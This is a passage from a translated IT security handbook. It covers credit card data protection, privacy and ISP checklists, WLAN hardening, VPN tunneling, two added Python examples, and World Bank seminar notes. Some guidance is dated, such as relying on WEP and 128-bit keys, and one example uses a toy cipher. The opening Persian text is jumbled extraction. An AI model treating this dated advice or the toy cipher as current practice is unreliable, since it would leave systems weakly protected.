‫ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﺁﻧﻬﺎ ﺭﺍ ﻃﻮﺭﻱ ﺣﺬﻑ ﻛﺮﺩ ﻛﻪ ﺩﻳﮕﺮ ﻗﺎﺑﻞ‬
‫ﺑﺎﺯﻳﺎﺑﻲ ﻫﻢ ﻧﺒﺎﺷﻨﺪ‪.‬‬
‫•‬
‫ﺗﻤﺎﻡ ﺩﺳﺘﺮﺳـﻴﻬﺎ ﺑـﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﺣـﺴﺎﺱ ﺑﺎﻳـﺪ ﺩﺭ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﮔﺰﺍﺭﺵ ﺛﺒﺖ ﺷﻮﻧﺪ‪ ،‬ﻭ ﺍﻳﻦ ﮔﺰﺍﺭﺷﺎﺕ ﺑﺎﻳﺪ‬
‫ﺩﺭ ﻓﻮﺍﺻﻞ ﺯﻣﺎﻧﻲ ﻣﻌﻴﻦ ﺗﺤﺖ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧـﺪ‬
‫ﺗﺎ ﻣﺸﻜﻼﺕ ﻳﺎ ﺧﻄﺎﻫﻬﺎﻱ ﺑـﺎﻟﻘﻮﻩ ﺁﺷـﻜﺎﺭ ﮔﺮﺩﻧـﺪ‪.‬‬
‫ﺍﻳﻦ ﮔﺰﺍﺭﺷﻬﺎ ﺑﺎﻳﺪ ﺩﺭ ﺩﻭ ﻓﺎﻳﻞ ﺛﺒﺘﻬﺎ ﻧﻮﺷﺘﻪ ﺷﻮﻧﺪ ﻭ‬
‫ﺍﺯ ﻧﺴﺨﺔ ﺩﻭﻡ ﺑﺎﻳﺪ ﺩﺭ ﺟﺎﻳﻲ ﻏﻴﺮ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻛـﻪ‬
‫ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺭﻭﻱ ﺁﻥ ﺍﺟﺮﺍ ﻣﻲﺷﻮﺩ ﻧﮕﻬـﺪﺍﺭﻱ‬
‫ﻛﺮﺩ‪.‬‬
‫•‬
‫ﻲ ﻫـﺸﺪﺍﺭﻫﺎﻱ‬
‫ﻫﻤﻮﺍﺭﻩ ﮔﺮﻭﻫﻬﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜ ﹺ‬
‫ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﺗﺎ ﺍﮔﺮ ﻧﻘﻄﻪﺿﻌﻔﻲ ﮔﺰﺍﺭﺵ‬
‫ﺷﺪﻩ ﺑﻮﺩ ﻛﻪ ﺍﺣﻴﺎﻧﹰﺎ ﻣﺮﺑﻮﻁ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻣﻲﺷﺪ‪،‬‬
‫ﺳﺮﻳﻌﹰﺎ ﺍﺯ ﺁﻥ ﻣﻄﻠﻊ ﺷﻮﻳﺪ‪.‬‬
‫•‬
‫ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺣﻤﻠﻪ‪ ،‬ﺗﻤﺎﻡ ﺍﺣﺘﻴﺎﻃﻬـﺎﻱ ﻣﻤﻜـﻦ‬
‫ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﻩ ﺭﺍ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪.‬‬
‫ﻓﻬﺮﺳﺖ ﺷﺮﻛﺘﻬﺎﻱ ﺍﺳﺘﻔﺎﺩﻩﻛﻨﻨﺪﻩ ﺍﺯ‬
‫ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ‬
‫ﺍﻟﻒ( ﺍﮔﺮ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﻧﻴﺴﺖ‬
‫•‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺮﻛﺖ ﺑﺎﻳﺪ ﺩﺭ ﻣﺤﻠﻲ ﻧﮕﻬﺪﺍﺭﻱ ﺷـﻮﻧﺪ‬
‫ﻛﻪ ﺍﺯ ﻧﻈﺮ ﻓﻴﺰﻳﻜﻲ ﺍﻳﻤﻦ ﺑﺎﺷﺪ‪.‬‬
‫•‬
‫ﺑﺮﺍﻱ ﺑﺎﺯ ﻛﺮﺩﻥ ﻗﻔـﻞ ﺭﺍﻳﺎﻧـﻪ ﺑﺎﻳـﺪ ﺍﺯ ﺭﻣـﺰ ﻋﺒـﻮﺭ‬
‫ﻞ ﺍﻓـﺮﺍﺩ‬
‫ﻣﺴﺘﺤﻜﻤﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺷـﺪﻩ ﺑﺎﺷـﺪ ﻭ ﺣـﺪﺍﻗ ﹺ‬
‫ﻣﻤﻜﻦ ﺑﺎﻳﺪ ﺁﻧﺮﺍ ﺑﺪﺍﻧﻨﺪ‪.‬‬
‫•‬
‫ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﻓﺮﺩ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﺪ ﻛـﻪ ﺑﺘﻮﺍﻧـﺪ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺑﻪ ﺳﺮﻗﺖ ﺑﺒﺮﺩ؛ ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﻣﻨﻴـﺖ‬
‫ﻓﻴﺰﻳﻜﻲ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺑﻪ ﺭﺍﻳﺎﻧﻪ ﺩﺳﺘﺮﺳﻲ‬
‫ﻓﻴﺰﻳﻜﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺁﻧـﺮﺍ ﺑـﺎ ﻳـﻚ‬
‫ﺩﻳﺴﻚ ﻓﻼﭘﻲ ﻳﺎ ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﺠﺪﺩ‬
‫ﻛﻨﻴــﺪ ﻭ ﺑﺪﻳﻨﻮﺳــﻴﻠﻪ ﺗﻤــﺎﻡ ﺳــﺪﻫﺎﻱ ﺍﻣﻨﻴﺘــﻲ‬
‫ﺳﻴــﺴﺘﻢﻋﺎﻣــﻞ ﻭ ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ ﻛــﺎﺭﺑﺮﺩﻱ )ﺑﺠــﺰ‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ( ﺭﺍ ﺩﻭﺭ ﺑﺰﻧﻴﺪ‪.‬‬
‫•‬
‫ﺟﻬﺖ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺩﺍﺩﻩﻫﺎ ﺑﺎﻳـﺪ ﺩﺭ‬
‫ﺳﻄﺢ ﻓﺎﻳﻠﻬﺎ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ‪.‬‬
‫‪200 Temporary Files‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﻗﺎﻋﺪﺓ ‪ .۲۵‬ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺗـﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘـﻲ ﺧـﻮﺩ ﺭﺍ ﺑـﺎ ﺭﻭﺷـﻬﺎ ﻭ‬
‫ﺁﺯﻣﻮﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻣﻮﺭﺩ ﺑﺎﺯﺑﻴﻨﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ‬
‫ﺍﺷﻜﺎﻻﺕ ﺍﺣﺘﻤﺎﻟﻲ ﺭﺍ ﭘـﻴﺶ ﺍﺯ ﻭﻗـﻮﻉ ﺳـﺎﻧﺤﻪ ﺭﻓـﻊ‬
‫ﻛﻨﻴﺪ‪.‬‬
‫ﻣﺎﺷﻴﻨﻬﺎﻱ ‪ Windows‬ﺑﻪ ﺍﻳـﻦ ﻣﻌﻨـﻲ ﺍﺳـﺖ ﻛـﻪ ﺑﺎﻳـﺪ ﺍﺯ‬
‫‪٢٠٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
• Make sure that all employees, and senior managers in particular, are convinced that security matters a great deal to the organization.
• If you delete information such as credit card data and other financial data from a hard disk, make sure that the data can no longer be recovered by any means. This takes more than simply deleting the files. If you do not know how to destroy data completely, get help from specialists.
• Make backups at regular intervals, and make sure that the copies containing credit card information are kept safe.
• Publish a "privacy policy" that tells users what data you store, what you use it for, and how you protect it (you may describe the protection indirectly and vaguely).
• If you validate credit cards online before charging them, make sure that the communication line you use is adequately secured. If you use a modem, make sure that nobody can dial in from outside.
• If you print records that contain credit card data, you must secure them physically as well, and shred them as soon as they are no longer needed.
• Buy several up-to-date books on e-commerce security from reputable sources, study them, and follow their recommendations. O'Reilly & Associates [201], John Wiley and Sons [202], and McGraw-Hill [203] have published good books on information technology security. The price of these books may vary depending on where you live, but buying them and putting them to good use is a very worthwhile investment in any case.

b) If the computer must be accessible from the internal network:
• Everything listed for the previous case, plus the following:
• Install a firewall so that only authorized users and transactions can reach the computer and public access to it is blocked.
• Install up-to-date security patches on all network equipment (routers, firewalls, switches, and so on).
• Use encryption for all credit card messages that travel over the line.
• Disable all unnecessary network services (such as the web server, remote procedure call [204], and file transfer protocol [205]).

c) If the credit card information is accessible over the World Wide Web:
• Everything listed for the previous case, plus the following:
• Do not keep credit card information on computers that are reachable from the Internet. Put the data on a separate machine behind a firewall, and reach it through remote procedure calls or other communication methods combined with good filtering at the firewall.

d) If the credit card information absolutely has to reside on a computer that is reachable from the Internet:
• Encrypt all transactions on the network with the strongest algorithms available (with a 128-bit key if possible).
• Make sure that credit card information stored temporarily on the web server is deleted as soon as the transaction completes.
• Apply all of the items above, but with even greater vigilance toward security risks. That computer, its transactions, and its activity logs must be monitored closely and continuously.

Checklist
Protecting customer data on a website
Here is a simple but practical approach that we recommend to websites that care about people's privacy. Explain your privacy policies on the first page of your website, and if any part of your policies is unclear, allow your company to be reviewed by auditors from outside the company.
• Do not require people to register and enter extra information in order to use the website.
• If users want to receive a newsletter, let them sign up with nothing more than their e-mail address.
• Do not pass users' e-mail addresses and personal information to other organizations without the user's explicit permission.
• Whenever you send mail to people, explain how you obtained their address and how they can remove it from your mailing list.
• Do not make your log files publicly accessible, and encrypt them if possible.
• Delete log files once you no longer need them.
• If log files must remain accessible over the Internet for a long time, remove from them any information that identifies individuals.
• Discipline or dismiss anyone who violates the privacy policy.

ISP checklist
This list is more detailed than what many ISPs use, but it is very important that every item be examined and that a sensible decision be made about implementing it.
• Because you sometimes store customers' credit card or other financial information, all of the rules for storing credit data must be applied.
• Providing security is neither an ad hoc nor a formulaic process. Understand the various issues and draw up an overall plan for each of them.
• Write a security policy that covers: the extent of your commitment to keeping customers' private information confidential (against access by your own employees or by other organizations); and the reporting procedures to follow when a security attack occurs (reporting to those responsible inside the organization, to ISPs, and to the authorities).
• Identify your legal responsibilities (are you solely responsible for safeguarding the information, how long must you keep log files, and so on).
• Write policies on how to respond to security alerts, customer concerns, peer ISPs, major bandwidth providers, and other Internet users.
• Be aware that customers of your services may attack outside systems. You can write a policy for responding to reports from other ISPs that your customers have had a hand in attacks.
• If you use virus-scanning software at the ISP level, you may decide to send the senders of infected messages a warning that "the message was not delivered because it was infected with a virus".
• Write an acceptable use policy (AUP) [206] that covers the mutual obligations of the ISP and its customers. This policy must be referenced in every customer contract.
• Design the network to be as usable and practical as possible. The systems that control and manage your network (including the system that hosts user accounts) must be separated from the Internet by a firewall.
• Make sure that you use strong passwords and restricted access rules on all computers in the administration section and the services section (such as the e-mail, web, authentication, proxy, and DNS servers) and on all network routing and control equipment.
• Make sure that all unnecessary services (such as finger, icq, ftp, compilers, and so on) are disabled on machines that can connect to the Internet.
• Make sure that all machines, especially those that can connect to the Internet, are kept up to date with security patches.
• Set up continuous network monitoring so that you can detect problems such as denial-of-service attacks and large-scale virus and spam activity. This requires that you understand the normal traffic patterns of your network.
• Set up auditing on the computers so that you can detect attackers more easily (do not forget the machines that host the log files and the user account information).
• Install virus scanners wherever e-mail enters or leaves.
• Encourage your customers to secure their machines by supplying free or cheap anti-virus software.
• Take care that your e-mail server does not become a distributor of spam.
• Install spam control mechanisms.
• Log all access to the servers and every connection to and disconnection from the network, so as to improve your ability to gather legal evidence against intruders.
• Create a strict and overlapping set of procedures for backing up your own information and that of your users.
• Download security patches and distribute them on compact discs or over a local distribution network. This not only makes it easier for customers to stay up to date and secure, it also reduces your own bandwidth consumption.

201 O'Reilly & Associates
202 John Wiley and Sons
203 Osborne / McGraw-Hill
204 Remote Procedure Call (RPC)
205 File Transfer Protocol (FTP)
206 Acceptable Use Policy
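The website checklist above says to delete log files once they are no longer needed and to strip identifying information from any that must stay reachable over the Internet. The following is an added example (not part of the handbook) of one way to do both for web server logs in the common "combined" format; the 30-day retention period, the choice of fields to blank, and the sample lines are assumptions made for illustration.

```python
import ipaddress
import re
from datetime import datetime, timedelta, timezone

RETENTION = timedelta(days=30)                           # assumed retention period
DEMO_NOW = datetime(2024, 3, 11, tzinfo=timezone.utc)    # fixed "now" for the sample
EMAIL_RE = re.compile(r'[\w.+-]+@[\w-]+(?:\.[\w-]+)+')
# Web server "combined" log format: client, ident, user, time, request, status, size,
# referrer, user agent.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

SAMPLE = [  # constructed log lines
    '203.0.113.77 - alice [10/Mar/2024:13:55:36 +0000] '
    '"GET /newsletter/confirm?email=alice@example.org&t=9f2c HTTP/1.1" 200 512 '
    '"https://example.org/signup?ref=bob@example.net" "Mozilla/5.0 (X11; Linux x86_64)"',
    '2001:db8:aa:bb:cc:dd:ee:ff - - [09/Mar/2024:08:01:02 +0000] '
    '"GET /profile/carol@example.com HTTP/1.1" 200 2048 "-" "curl/8.4.0"',
    '198.51.100.9 - - [01/Jan/2024:00:00:00 +0000] "GET / HTTP/1.1" 200 100 "-" "curl/8.4.0"',
    'corrupted line with dave@example.com',
]


def mask_ip(text):
    """Keep only the network part of the client address: /24 for IPv4, /48 for IPv6."""
    try:
        addr = ipaddress.ip_address(text)
    except ValueError:
        return "-"          # a hostname or garbage: drop it entirely
    prefix = 24 if addr.version == 4 else 48
    return str(ipaddress.ip_network(f"{addr}/{prefix}", strict=False).network_address)


def strip_query(url):
    """Query strings and fragments often carry e-mail addresses, tokens and search terms."""
    return re.split(r'[?#]', url, maxsplit=1)[0]


def scrub_line(line, now):
    """Return the anonymized line, or None if it is past retention or cannot be parsed."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None         # never publish a line that could not be parsed and cleaned
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    if now - ts > RETENTION:
        return None         # "delete log files once you no longer need them"
    target = EMAIL_RE.sub("[email]", strip_query(m["target"]))
    referer = "-" if m["referer"] in ("", "-") else strip_query(m["referer"])
    referer = EMAIL_RE.sub("[email]", referer)
    agent = m["agent"].split("/", 1)[0].split(" ", 1)[0] or "-"   # product name only
    # The authenticated user name is blanked and the time is rounded down to the hour.
    return (f'{mask_ip(m["ip"])} - - [{ts:%d/%b/%Y:%H:00:00 %z}] '
            f'"{m["method"]} {target} {m["proto"]}" {m["status"]} {m["size"]} '
            f'"{referer}" "{agent}"')


def scrub_log(lines, now):
    """Anonymize a whole log, silently dropping expired and malformed lines."""
    return [out for out in (scrub_line(line, now) for line in lines) if out is not None]


if __name__ == "__main__":
    for cleaned in scrub_log(SAMPLE, DEMO_NOW):
        print(cleaned)
```

Run it on a copy of the log before publishing and keep the original under the access controls and encryption the checklist asks for, then delete that original on the same retention schedule.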
Sixteen steps for securing a WLAN
Wireless network security is very much like the physical security of a building's front door: anyone with enough motivation, budget, resources, and time can compromise it. A wireless network must be treated like a public network that anyone can reach. The system administrator must never assume that data carried over the wireless network is private and secure. The security recommendations below, drawn from the suggestions and advice of the pioneers of this industry, offer simple points for building an infrastructure to secure a wireless network:
1. Prepare an organization-wide approach to wireless devices. Set the organization's security and network usage policies and guidelines so that they are consistent with one another.
2. Find out how many employees use the organization's WLAN at home. These remote users must be monitored so that unauthorized access points to the network can be blocked.
3. Put a process in place for managing user accounts, so that they can be managed securely.
4. Disable unnecessary services on all servers and clients. As a rule, every unknown or unused service should be disabled.
5. Change the default settings of your products. Many administrators make the mistake of leaving the SSID or the IP address of their access points at the initial value. Do not change the SSID to something that identifies the company's name, departments, or products. Otherwise, because the SSID is broadcast publicly by the access point, an intruder who breaks the WEP key will immediately know whose network he has gained access to.
6. Change the default password of the access point or wireless router. Intruders usually know the manufacturers' default passwords and try them first.
7. Limit wireless coverage to the extent of your own building at most, and no further. As you survey your office for a suitable place to put the access point, bear in mind that you should choose a spot toward the center of the building; if you put it near windows, stronger signals may radiate outside the building and make your network easier for others to find.
8. Obtain directional antennas for the wireless segments. Most wireless devices use omnidirectional antennas. Such antennas give an attacker the chance to capture all communications, whereas with directional antennas operating at around 2.4 GHz or higher, the range over which the signal spreads is much smaller.
9. Enable WEP. To do so, change the default WEP key, and after that repeat the change weekly. [207]
10. Use a VPN tunnel between the firewall and the wireless network. Although this requires setting up a VPN server, on the other side VPN client software is built into most operating systems, such as Windows 98 SE, Windows 2000, and Windows XP.
11. Deploy a network-based intrusion detection system (NIDS) [208] on the wireless network. [209]
12. Install anti-virus software, organization-wide, on all wireless clients.
13. Use two-factor authentication [210], because it removes a large share of the risk. There are two ways to use two-factor authentication. The first is to use "token-based smart cards" that store individuals' biometric information. [211] The second is to use RADIUS [212] servers, which authenticate the computer to the network and also establish your connection to the access point. The user connects to the RADIUS server solely in order to be authenticated to the other servers. In effect, in this method the RADIUS servers control who comes and goes, like the guard of a hall. [213]
14. Use a wireless firewall as the gateway. [214] This device works like a standard dual-homed [215] firewall, with the wireless network on one side and the trusted internal network on the other. The firewall uses security software such as IPSec and other VPN mechanisms, and the internal network can be reached through them only after authentication. Firewall rules can be used to restrict the destinations of traffic leaving the wireless network. Make sure that there is a firewall between every wireless access point and the internal network or the Internet.
15. Disable the DHCP service and use static IP addresses for your wireless network cards. Also change the wireless network's default IP address range from the one set by the manufacturer.
16. Buy only access points that can be upgraded. Advances in the security of such devices are made all the time, so you need to be sure that you will always be able to keep your access points up to date.

207 Source: NIPC, http://www.nipc.gov/publications/nipcpub/bestpract.html
208 Network Based Intrusion Detection System
209 Source: Chris Bateman, CERT analyst
210 Two Factor Authentication
211 Bateman recommends a method that he calls e-thenticator, in which a special device stores the thumbprint on a smart card.
212 Remote Authentication Dial-In User Service
213 RADIUS, the "Remote Authentication Dial-In User Service", is an authentication service that checks the user's information and, once it has verified that information, allows the user to access network services. Part of what RADIUS can provide is encrypted communication between remote clients and the RADIUS server. Virtual private networks (VPNs) work in a similar way, but instead of connecting a remote host to a network they connect two networks. Once the remote computer has been authenticated and connected to the internal network by the RADIUS server, it behaves as if it were physically next to the network and attached to it. In other words, the RADIUS server's encryption exists only between that server and its client, not across the whole network.
214 Rick Fleming, deputy head of the security department at Digital Defense
215 Dual Homed
More information on VPNs
To protect the information on systems that use any of the technologies mentioned, you should set up a VPN in such a way that all of the trusted gateways of the internal network belong to this VPN and every user goes through this mechanism when accessing the trusted networks. In essence, a VPN is a private connection between two devices that carries confidential information securely across a shared public network such as the Internet. VPN technology lets an organization make its network services available securely, over the Internet, to remote users, branches, and partner companies. In other words, a VPN turns the Internet into a simulated private WAN [216]. A VPN also lets remote users reach their company's servers.
To use the Internet as a private wide area network, organizations have to overcome two main obstacles. First, networks often communicate using different protocols, but a VPN provides a way to carry protocols other than IP from one network to another. Second, packets on the Internet travel as plain text, so anyone who can see Internet traffic can also read the information inside the packets. This is a serious problem, particularly if, for example, banks want to use the Internet to exchange important and confidential business data. A VPN overcomes these problems with a mechanism called tunneling [217]. In this mechanism, instead of being sent in the ordinary way, the data is first encrypted for greater security, then placed inside an IP packet, and then sent over the Internet.
Many products, such as those of Nokia, Cisco, Nortel, Checkpoint, and Microsoft, include secure and suitable VPN technology [218] that can be placed at various points in the network. Although a VPN protects the content of the data exchanged over the network, depending on how it is placed in the network it may not be able to prevent unauthorized access from outside the network. In other words, even though the VPN stops an unauthorized user from seeing the content of the data, that user may still be able to reach network resources and change bandwidth use in such a way that the network's capacity is exhausted and a denial-of-service attack is carried out against authorized users. Access control, authentication, and encryption are the vital elements of a secure connection. For a long time the Point-to-Point Protocol (PPP) [219] was used as the universal link layer [220] protocol for building tunnels between devices on the Internet; in recent years, however, the Point-to-Point Tunneling Protocol (PPTP) [221] and the Layer 2 Tunneling Protocol (L2TP) [222] have been preferred for this purpose. [223]

216 Wide Area Network
217 Tunneling
218 The IETF is currently revising the VPN standards to make IPSec more secure and also compatible with satellite communications.
219 Point-to-Point Protocol
220 Link Layer
221 Point-to-Point Tunneling
222 Layer 2 Tunneling Protocol
223 The article "Safe Passage" by Karen Bannas in PC Magazine reviews seven VPN vendors for products suited to mid-sized companies with a budget of about ten thousand dollars that need a VPN to connect their head office and branches: http://www.pcmag.com/print_article/0,3048,a%3D12352,00.asp
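The tunneling mechanism described above (encrypt the data, place it inside an IP packet, send it across the public network) can be followed step by step in the sketch below. It is an added example, not code from the handbook or from any VPN product: the packet layout is modeled loosely on IPsec ESP, the cipher is a standard-library stand-in (HMAC-SHA256 in counter mode) rather than a production algorithm, and the gateway addresses, keys, and payload are constructed.

```python
import hashlib
import hmac
import socket
import struct

ESP_PROTO = 50   # IP protocol number assigned to IPsec ESP
TAG_LEN = 16     # bytes of HMAC-SHA256 kept as the integrity tag
WINDOW = 64      # anti-replay window, in packets

class TunnelError(Exception):
    pass

def _fold(total):
    """One's-complement fold used by the IPv4 header checksum."""
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total

def _ipv4_header(src, dst, payload_len):
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, 64,
                      ESP_PROTO, 0, socket.inet_aton(src), socket.inet_aton(dst))
    checksum = ~_fold(sum(struct.unpack("!10H", hdr))) & 0xFFFF
    return hdr[:10] + struct.pack("!H", checksum) + hdr[12:]

def _keystream_xor(key, seq, data):
    """Stand-in cipher so the example needs no extra packages; not for real traffic."""
    stream, block = b"", 0
    while len(stream) < len(data):
        stream += hmac.new(key, struct.pack("!IQ", seq, block), hashlib.sha256).digest()
        block += 1
    return bytes(a ^ b for a, b in zip(data, stream))

class TunnelSA:
    """One direction of a gateway-to-gateway tunnel; each direction needs its own keys."""

    def __init__(self, src_gw, dst_gw, spi, enc_key, auth_key):
        self.src_gw, self.dst_gw, self.spi = src_gw, dst_gw, spi
        self.enc_key, self.auth_key = enc_key, auth_key
        self.tx_seq = 0      # sender state
        self.rx_top = 0      # receiver state: highest sequence number accepted
        self.rx_seen = 0     # bitmap of accepted numbers at or below rx_top

    def encapsulate(self, inner):
        """Encrypt the inner packet, authenticate it, wrap it in an outer IP header."""
        self.tx_seq += 1
        body = struct.pack("!II", self.spi, self.tx_seq)
        body += _keystream_xor(self.enc_key, self.tx_seq, inner)
        body += hmac.new(self.auth_key, body, hashlib.sha256).digest()[:TAG_LEN]
        return _ipv4_header(self.src_gw, self.dst_gw, len(body)) + body

    def decapsulate(self, packet):
        """Authenticate first, then check for replay, and only then decrypt."""
        body = packet[20:]
        if packet[9] != ESP_PROTO or len(body) < 8 + TAG_LEN:
            raise TunnelError("not a tunnel packet")
        data, tag = body[:-TAG_LEN], body[-TAG_LEN:]
        spi, seq = struct.unpack("!II", data[:8])
        if spi != self.spi:
            raise TunnelError("unknown SPI")
        expected = hmac.new(self.auth_key, data, hashlib.sha256).digest()[:TAG_LEN]
        if not hmac.compare_digest(tag, expected):
            raise TunnelError("authentication failed")
        self._accept_once(seq)
        return _keystream_xor(self.enc_key, seq, data[8:])

    def _accept_once(self, seq):
        if seq > self.rx_top:
            shift = seq - self.rx_top
            self.rx_seen = ((self.rx_seen << shift) | 1) & ((1 << WINDOW) - 1)
            self.rx_top = seq
            return
        offset = self.rx_top - seq
        if seq == 0 or offset >= WINDOW or (self.rx_seen >> offset) & 1:
            raise TunnelError("replayed or stale packet")
        self.rx_seen |= 1 << offset

def outer_view(packet):
    """Everything an eavesdropper on the public network can read."""
    spi, seq = struct.unpack("!II", packet[20:28])
    return {"src": socket.inet_ntoa(packet[12:16]), "dst": socket.inet_ntoa(packet[16:20]),
            "proto": packet[9], "spi": spi, "seq": seq,
            "checksum_ok": _fold(sum(struct.unpack("!10H", packet[:20]))) == 0xFFFF}

def demo():
    keys = (b"E" * 32, b"A" * 32)                            # constructed keys
    head_office = TunnelSA("192.0.2.1", "198.51.100.1", 0x1001, *keys)
    branch = TunnelSA("192.0.2.1", "198.51.100.1", 0x1001, *keys)
    inner = b"\xe0\xe0\x03 non-IP frame: ledger sync 0042"   # constructed payload
    packet = head_office.encapsulate(inner)
    results = {"view": outer_view(packet), "leaks": inner in packet,
               "delivered": branch.decapsulate(packet) == inner}
    tampered = packet[:-1] + bytes([packet[-1] ^ 1])
    for name, bad in (("replay", packet), ("tamper", tampered)):
        try:
            branch.decapsulate(bad)
            results[name] = "accepted"
        except TunnelError as err:
            results[name] = str(err)
    return results

if __name__ == "__main__":
    print(demo())
```

Checking the tag before decrypting lets the receiving gateway discard forged or replayed packets cheaply, but as the text notes this protects content only: traffic aimed at the gateway's public address still has to be filtered and rate limited in front of it.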
Chapter Thirteen
International Dialogues on Security

Overview
The examples that follow, of security breaches and of the innovative solutions and policies used to counter them, are drawn from two seminars held by the World Bank: the first, titled "Electronic Security: Risk Mitigation in the Financial Services Sector", on 25 September 2002, and "Electronic Safety and Integrity", on 10 September 2003. Video recordings of both sessions are available over the Internet. [224] This chapter contains the key points of these seminars and the remarks of the representatives of the participating countries.

2002 global seminar: risk mitigation in the financial services sector [225]
The session opened with an introduction to electronic risk [226], and the papers pointed to the transformation of "closed networks" into "open networks" over the past ten years. In open networks, dependence on capabilities such as SSL, whose algorithm had recently been broken, caused problems, because it could allow vulnerabilities to persist for a long time. For banks there are not only blended threats such as Code Red; the danger of organized crime hacking rings is also real. Many of these criminal rings use Internet casinos as a tool for money laundering. According to an estimate by the company Internet Data, about 57% of intrusions have been directed at the financial industry. In addition, as intrusion methods grow more sophisticated, the skill level of intruders is falling, because malicious code is available for anyone to download and use. With these tools, even people without much depth of knowledge can carry out large intrusions.
Electronic fraud, especially in intrusions carried out from Eastern Europe against the United States, has mostly taken the form of either identity theft or extortion. Other methods include salami slicing [227], funds transfer, and stock manipulation. In Asia, intrusions have been aimed at specific targets in the economic sector and at critical targets in the technology sectors.
The introductory discussion of electronic risks also covered the vulnerabilities of wireless technology, in particular the GSM standard. Two key points about the risks of wireless technology were raised: gateway vulnerabilities and "man in the middle" attacks. The latter occur because mobile phone towers cannot authenticate themselves to mobile phones.

Notes on laws and regulations
While e-commerce laws were not very common five years ago, forty countries have such laws today, and the number is growing. Laws on electronic transactions and on the rights and responsibilities of consumers are especially important and are expanding rapidly. The key topics of this discussion are:
• the validity of electronic signatures and transactions;
• the protection of personal information, and the announcement of operational guidelines for the secure use of information;
• secure payment systems between banks, especially electronic banks;
• money laundering and the level of international cooperation needed to prevent it; and
• the development of cybercrime laws that also cover the use of computers in criminal activity.
Implementing these properly requires public acceptance of the regulations, an end to going it alone, and a high level of knowledge among legislators. Although different industries have cooperated at various levels in the past, the security of electronic payments is one area that has brought about a complete overlap of the telecommunications and banking sectors. The banking industry defined its benchmarks for safety and soundness as "non-discriminatory access to sound and secure financial systems", while the ideal of the telecommunications industry was "universal access based on public interest and welfare". Such differing definitions of "secure services" make it hard for organizations to secure their networks and take economic needs into account at the same time.

Monitoring and prevention
Despite the many difficulties of addressing the twin requirements of safety and soundness, electronic security is a vital need for most organizations, and a great deal of effort and coordination is needed to reduce operational, legal, and reputational risks in the information technology environment. Plans put forward to increase the security of systems must cover the following:
• Education, awareness, and skills training. World Bank research shows that about 50% of security breaches stem from internal threats. If the incorrect application of computer security measures, or the failure to implement them, is added to this figure, the percentage rises further still.
• Auditing and testing of processes. To speed up the handling of matters, there must be broad cooperation among all the parties involved. For example, European Union banks have servers in Antigua. If these servers fail, the bank will be unable to provide its services as well, and if cross-sector cooperation runs into difficulty, urgent action in this area is delayed.
